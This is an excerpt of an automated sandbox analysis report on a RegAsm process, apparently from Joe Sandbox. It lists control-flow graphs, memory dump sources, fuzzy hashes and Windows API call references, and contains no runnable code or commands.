                                                                                                                                                                                                                                          control_flow_graph 498 6a14c44 499 6a14c4e 498->499 500 6a14c58-6a14c6f 499->500 501 6a14c75-6a14c77 500->501 502 6a14c79-6a14c7f 501->502 503 6a14c8f-6a14cb0 501->503 504 6a14c81 502->504 505 6a14c83-6a14c85 502->505 508 6a14cf7-6a14cfe 503->508 504->503 505->503 509 6a14c31-6a14c40 508->509 510 6a14d04-6a14e06 508->510 513 6a14cb2-6a14cb6 509->513 514 6a14c42 509->514 515 6a14cc5 513->515 516 6a14cb8-6a14cc3 513->516 514->498 518 6a14cca-6a14ccd 515->518 516->518 518->510 521 6a14ccf-6a14cd3 518->521 522 6a14ce2 521->522 523 6a14cd5-6a14ce0 521->523 524 6a14ce4-6a14ce6 522->524 523->524 526 6a14e09-6a14e67 524->526 527 6a14cec-6a14cf6 524->527 534 6a14e69-6a14e6f 526->534 535 6a14e7f-6a14ea1 526->535 527->508 536 6a14e71 534->536 537 6a14e73-6a14e75 534->537 540 6a14ea4-6a14ea8 535->540 536->535 537->535 541 6a14eb1-6a14eb6 540->541 542 6a14eaa-6a14eaf 540->542 543 6a14ebc-6a14ebf 541->543 542->543 544 6a14ec5-6a14eda 543->544 545 6a15176-6a1517e 543->545 544->540 547 6a14edc 544->547 548 6a15010-6a15033 547->548 549 6a14ee3-6a14f10 547->549 550 6a14f58-6a14f7d 547->550 551 6a150be-6a150e3 547->551 564 6a15223-6a15252 548->564 565 6a15039-6a1503d 548->565 575 6a14f16-6a14f20 549->575 576 6a151ed-6a1521c 549->576 567 6a14f83-6a14f87 550->567 568 6a14f7f-6a14f81 550->568 569 6a150e5-6a150e7 551->569 570 6a150e9-6a150ed 551->570 582 6a15259-6a15288 564->582 571 6a15043-6a1504d 565->571 572 6a1528f-6a152c6 565->572 573 6a14f89-6a14fa6 567->573 574 6a14fa8-6a14fcb 567->574 577 6a14fe5-6a1500b 568->577 580 6a1514b-6a15171 569->580 578 6a150ef-6a1510c 570->578 579 6a1510e-6a15131 570->579 581 6a15053-6a15082 571->581 571->582 573->577 608 6a14fe3 574->608 609 6a14fcd-6a14fd3 574->609 583 6a151b7-6a151e6 575->583 584 6a14f26-6a14f53 575->584 576->564 577->540 578->580 613 6a15133-6a15139 579->613 614 6a15149 579->614 580->540 619 6a15090-6a150b9 581->619 620 6a15084-6a15086 581->620 582->572 583->576 584->540 608->577 616 6a14fd5 609->616 617 6a14fd7-6a14fd9 609->617 622 6a1513b 613->622 623 6a1513d-6a1513f 613->623 614->580 616->608 617->608 619->540 620->619 622->614 623->614
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240491697.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a10000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-1273862796
                                                                                                                                                                                                                                          • Opcode ID: 3fadb743c510b3574d3105d3a85ecdb09a10bb8883cbb2cd4d45b00c10421a03
                                                                                                                                                                                                                                          • Instruction ID: d7848ff6c512bbf5acec571982eb2dfeb732bf221745be671674f8942e297869
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fadb743c510b3574d3105d3a85ecdb09a10bb8883cbb2cd4d45b00c10421a03
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E19B30B002058FDB55AF68C994A7ABBE6FF89710B11446DD5069F3A2CF79EC05CBA1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 630 6a11582-6a11584 631 6a1158e 630->631 632 6a11598-6a115af 631->632 633 6a115b5-6a115b7 632->633 634 6a115b9-6a115bf 633->634 635 6a115cf-6a115f1 633->635 636 6a115c1 634->636 637 6a115c3-6a115c5 634->637 640 6a11638-6a1163f 635->640 636->635 637->635 641 6a11571-6a11580 640->641 642 6a11645-6a11747 640->642 641->630 645 6a115f3-6a115f7 641->645 646 6a11606 645->646 647 6a115f9-6a11604 645->647 649 6a1160b-6a1160e 646->649 647->649 649->642 651 6a11610-6a11614 649->651 653 6a11623 651->653 654 6a11616-6a11621 651->654 655 6a11625-6a11627 653->655 654->655 657 6a1174a-6a1177c 655->657 658 6a1162d-6a11637 655->658 664 6a11795-6a117a7 657->664 665 6a1177e-6a11794 657->665 658->640 667 6a117a9-6a117af 664->667 668 6a117bf-6a117e1 664->668 665->664 669 6a117b1 667->669 670 6a117b3-6a117b5 667->670 673 6a117e4-6a117e8 668->673 669->668 670->668 674 6a117f1-6a117f6 673->674 675 6a117ea-6a117ef 673->675 676 6a117fc-6a117ff 674->676 675->676 677 6a11805-6a1181a 676->677 678 6a11abf-6a11ac7 676->678 677->673 680 6a1181c 677->680 681 6a11990-6a119bd 680->681 682 6a11823-6a118d3 680->682 683 6a11a07-6a11a2c 680->683 684 6a118d8-6a1198b 680->684 706 6a119c3-6a119cd 681->706 707 6a11b36-6a11b77 681->707 682->673 700 6a11a32-6a11a36 683->700 701 6a11a2e-6a11a30 683->701 684->673 702 6a11a57-6a11a7a 700->702 703 6a11a38-6a11a55 700->703 708 6a11a94-6a11aba 701->708 727 6a11a92 702->727 728 6a11a7c-6a11a82 702->728 703->708 709 6a11b00-6a11b2f 706->709 710 6a119d3-6a11a02 706->710 708->673 709->707 710->673 727->708 730 6a11a84 728->730 731 6a11a86-6a11a88 728->731 730->727 731->727
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240491697.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a10000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-3723351465
                                                                                                                                                                                                                                          • Opcode ID: a57b3289a6371ba60de8f1dcc048938e2ba0abd5d6c299c4dff5dceceac1f26f
                                                                                                                                                                                                                                          • Instruction ID: 8fd430786265dfa1623258f64bb98363ae76f73ec2b3c7ee795557720b4c94b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a57b3289a6371ba60de8f1dcc048938e2ba0abd5d6c299c4dff5dceceac1f26f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81C1D4347042049FDB58AB68C994A7EBBEAEF85700F10846AD7028F392DF75DC05CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1545 6a38c88-6a38c94 1546 6a38d00-6a38d25 1545->1546 1547 6a38c96-6a38c9a 1545->1547 1549 6a38d2c-6a38d51 1546->1549 1548 6a38ca0-6a38ca7 1547->1548 1547->1549 1550 6a38d58-6a38dad 1548->1550 1551 6a38cad-6a38cef 1548->1551 1549->1550 1569 6a38e07-6a38e46 1550->1569 1570 6a38daf-6a38dd4 1550->1570 1567 6a38cf7-6a38cfd 1551->1567 1579 6a38e48 1569->1579 1580 6a38e4d-6a38e5b 1569->1580 1573 6a38dd6-6a38dd9 1570->1573 1574 6a38ddc-6a38dff 1570->1574 1574->1569 1579->1580
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq$(aq
                                                                                                                                                                                                                                          • API String ID: 0-3916115647
                                                                                                                                                                                                                                          • Opcode ID: a0f863f104b5e36e98256ffd3a3e9a58edd110ec1d70ea5a431831678c1f3da9
                                                                                                                                                                                                                                          • Instruction ID: 6a2e81cd1af6ed6d4eb9bf120d081dd6ef816c6ae8636161cbdee2137a830126
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0f863f104b5e36e98256ffd3a3e9a58edd110ec1d70ea5a431831678c1f3da9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1411630B0429A5FCB49AF78945067F7FA6BFD5790F2440AAE9059B385CE34CD06C3A2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240491697.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a10000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: lPj
                                                                                                                                                                                                                                          • API String ID: 0-417912878
                                                                                                                                                                                                                                          • Opcode ID: 1f20319c41505495bc66b4985d134558358579d9d06dcb9ea02db51e7acf7441
                                                                                                                                                                                                                                          • Instruction ID: ddeda34c75226513dcd33416afa1a4984e6296df30b747133996b19b0b183439
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f20319c41505495bc66b4985d134558358579d9d06dcb9ea02db51e7acf7441
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD02AC307002158FCB54AF64D994A2EBAB6FF89714F00456DD602AF3A5CF7AEC49CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2216662348.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1550000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                                          • Opcode ID: 8e8368bc2bff4301c89fea9711a50e56e71a5ff7535c9432e3ea22618fd319de
                                                                                                                                                                                                                                          • Instruction ID: ea62bfe95b8cbf59fb92b52efb0ba7886e456ee66e81d6ac91758fab9d526e7f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8368bc2bff4301c89fea9711a50e56e71a5ff7535c9432e3ea22618fd319de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C37157B0A00B058FD764DF29D45475ABBF1FF88304F008A2ED95ADBA50DB74E849CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 015559F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2216662348.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1550000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: c24268e0d97a63c36ea03cdf4564218c98d4cbcdad3c2d1529c4ae74dd16b26b
                                                                                                                                                                                                                                          • Instruction ID: 7ff4f428ef3a220e2c11f3df630bc743e757867d200fcb52e175b071104dc56c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c24268e0d97a63c36ea03cdf4564218c98d4cbcdad3c2d1529c4ae74dd16b26b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D41FFB0C00719CBDB64CFA9C894B9DBBF5FF49304F20806AD408AB254DBB5694ACF91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 015559F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2216662348.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1550000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: 9841ef246adee90c156749fdb12e507efa331162256f0a5de604747cf3288b56
                                                                                                                                                                                                                                          • Instruction ID: ca707c1d57b8ce259d4f5e9793c402a780d433195cb18abcf9de464f09b050a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9841ef246adee90c156749fdb12e507efa331162256f0a5de604747cf3288b56
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41FFB0C00719CADB24CFA9C894B9DBBB5FF48304F24806AD418AB254DBB5694ACF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0155D2C6,?,?,?,?,?), ref: 0155D387
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2216662348.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1550000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                                          • Opcode ID: 1754da78f6f4370f186569460b948343e408f87ba0485f2d2fca8dae8ca0c836
                                                                                                                                                                                                                                          • Instruction ID: c78fd8bb3d2203a56aba48f29d6cdb15c4ade8260fc401731742da99e4f1b556
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1754da78f6f4370f186569460b948343e408f87ba0485f2d2fca8dae8ca0c836
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A221E4B5900248DFDB10CF9AD984AEEBFF4FB48320F14841AE918A7311D378A954CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0155D2C6,?,?,?,?,?), ref: 0155D387
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2216662348.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1550000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                                          • Opcode ID: 089b66d9df2489a3f316f5ed7e4a0d1c4ec7955f29881e25491b120f0ba90a34
                                                                                                                                                                                                                                          • Instruction ID: 3bc8bb8e3df113c790f12650b02644792f7d26bcdb3d107159e2fa79d1e5bfdd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 089b66d9df2489a3f316f5ed7e4a0d1c4ec7955f29881e25491b120f0ba90a34
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE21B3B69002499FDB10CF99D585AEEBBF5FB48324F14841AE918B7310D378A954CFA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0155AE4C), ref: 0155B086
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2216662348.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1550000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                                          • Opcode ID: e936a5b3124a16be90db32dfedd4c0636e99b6a9ab8f3853eb852cd281f416aa
                                                                                                                                                                                                                                          • Instruction ID: 314bd13c629c73c4311b9a7bb712e286f7dda6110b954847be7bf44228849698
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e936a5b3124a16be90db32dfedd4c0636e99b6a9ab8f3853eb852cd281f416aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311F0B5C007498BDB20DF9AC448BAEFBF5EB49320F14841AD929B7210D379A549CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 06CF8535
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                          • Opcode ID: 7341801091eb4007273b97a0c02f0c0f23030ee4bbc2c4e9f8ab3763781b1831
                                                                                                                                                                                                                                          • Instruction ID: 0bc030037dfdb91384f95e5ac06c09d447566a72d2d3e9f5db52453ebeb612f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7341801091eb4007273b97a0c02f0c0f23030ee4bbc2c4e9f8ab3763781b1831
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D1112B5C006488FDB60DF9AD948BDEFBF8EB48324F248419D519B7200C378A984CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 06CF8535
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                          • Opcode ID: f1dcdaf4de02b602dade25d87283381f6e88f33bdea871634cc955ed0e742093
                                                                                                                                                                                                                                          • Instruction ID: 121ee5fea4ea2f5a8e0d4063938d8473a30ff30fdc43b1bdc92d21f3e19f59d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1dcdaf4de02b602dade25d87283381f6e88f33bdea871634cc955ed0e742093
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 821115B58007488FDB60DF9AD548BDEBFF8EB48324F248459D619B7200D378A944CFA5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: c59b1a4154b38b4f2c38bc7af68c83549ff081d1e22be5ba62616ed5f7c677f1
                                                                                                                                                                                                                                          • Instruction ID: 94ad5d785f988b9e9941d445f5a4e6bc81911bb723db15d2d288d490c0729010
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c59b1a4154b38b4f2c38bc7af68c83549ff081d1e22be5ba62616ed5f7c677f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C16B34A00612CFC765DF1DC58086ABBF2FF89314B19CA99E45A8B666D730FD46CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240491697.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a10000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 28d9153dcde7d49fef1ff6e0d07ce5443b1e0e4e1eb6e97cb335332e8ce297bb
                                                                                                                                                                                                                                          • Instruction ID: 299f35bd7695c8989e942c9ff1703b7632e8f4b4b91f9ac945e8b401b24220ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28d9153dcde7d49fef1ff6e0d07ce5443b1e0e4e1eb6e97cb335332e8ce297bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9C26F30A401189FCB55DF64CC94BADBBB6FF88700F108199E606AB3A1DB75DE81DB61
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 44adb6fd2a393b3e37d707461af81e344f1e90418ada1c5c6af70d6ee4cade97
                                                                                                                                                                                                                                          • Instruction ID: 64fbcdda73d64eb9608a66d6f2e337bce895fab359f3b795186844deab1609b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44adb6fd2a393b3e37d707461af81e344f1e90418ada1c5c6af70d6ee4cade97
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4431E1317043614FC729AB38A45086ABBEAEFC725071545BAE54ACF351CE39DC0BC7A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 76da8d3cbb1a55098c94c24909bf7e98a1b3c55ffb55d924a247e298c66d3276
                                                                                                                                                                                                                                          • Instruction ID: 2da83f9e019103ee28fc9b075613ff83442c37667c0fd852bf1cdeccd8008763
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76da8d3cbb1a55098c94c24909bf7e98a1b3c55ffb55d924a247e298c66d3276
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0314F357002158FDB08FBB994946AEB6D7EFC8210B10453DD61ADB394EF399E0687E2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 2f036c1d7390ff0ed840c417f5cc717874eae25d89b6455c38a4a08ab6126dfa
                                                                                                                                                                                                                                          • Instruction ID: 82f0577b45785f6810ddd21c644bf12669f079d9c17c14b7bd0152c872c1bc06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f036c1d7390ff0ed840c417f5cc717874eae25d89b6455c38a4a08ab6126dfa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6316F347002158FDB08BB7894A566E76E7EFC9210B14443DD51ADB394EF39DE0687E2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: cb0a5b2ffccccab82855eb041891f195ac203d6fcd20f609d1560efda7cd36f4
                                                                                                                                                                                                                                          • Instruction ID: b0befa714f6371b5b66bfbacc858526fcb8f90547ff9fc06cf8a9345765a285e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb0a5b2ffccccab82855eb041891f195ac203d6fcd20f609d1560efda7cd36f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33019E34915209EFCB05EFB8E5559ACBFB4FF85200F1046AED449AB361DA381E49CB51
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4']q
                                                                                                                                                                                                                                          • API String ID: 0-1259897404
                                                                                                                                                                                                                                          • Opcode ID: 87e8b3a290feee80bab489ea35ea50004ce5b21b166511ee6847e62572c03f3f
                                                                                                                                                                                                                                          • Instruction ID: 3f4ce787d61943b4862a050e6db9717699543d9955d92efce774193ab23990c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87e8b3a290feee80bab489ea35ea50004ce5b21b166511ee6847e62572c03f3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF01930A11209EFCB08EFB8E55599CBBB5FB84204F1046BDC84AA7361DB785E49CB55
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240491697.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a10000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4690e6bf7607d2f1c8b7b0280e5578943bcf789a1f3fd18aa640cf6b984d835d
                                                                                                                                                                                                                                          • Instruction ID: f1ca43fcb3906bf51a376ee34826feeec15425a5871528942796d3615db80050
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4690e6bf7607d2f1c8b7b0280e5578943bcf789a1f3fd18aa640cf6b984d835d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49428D307406158FCB65AF78D550A2EBAB6FF85314B01496DC603AF394CF7AED098B91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240491697.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a10000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
